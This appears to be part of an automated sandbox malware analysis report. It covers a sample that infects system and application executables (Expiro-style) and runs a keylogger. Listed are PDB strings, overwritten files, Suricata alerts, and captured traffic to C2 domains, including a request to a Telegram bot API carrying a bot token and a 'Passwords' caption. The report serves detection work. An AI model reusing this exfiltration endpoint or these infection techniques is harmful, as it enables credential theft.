Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2118045779.0000000001F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdbp source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb source: CNFNOT32.EXE.2.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OcPubMgr.exe.2.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
Source:	Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: updater.pdb source: armsvc.exe, 00000002.00000003.2547468354.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then sub rsp, 28h	2_3_02229220
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then lea rcx, qword ptr [0000000002D39C30h]	2_3_02223AB0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then sub rsp, 28h	2_3_02222E10
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then mov eax, dword ptr [00000000035854B8h]	2_3_0222EC54
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then sub rsp, 28h	2_3_0222EC84
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then sub rsp, 28h	2_3_0222ED67
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then sub rsp, 28h	2_3_0222EDA4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 4x nop then sub rsp, 28h	2_3_0222EDE4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.11:55887 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.11:49713 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.11:58700 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.11:49813 -> 82.112.184.197:80
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.11:49711 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d2fbe638dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 72.52.178.23 72.52.178.23

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.11:49713
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.11:49713
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49705 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.11:49717
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.11:49717

Source: global traffic	HTTP traffic detected: POST /uljtmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /lfsgndokapxyhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
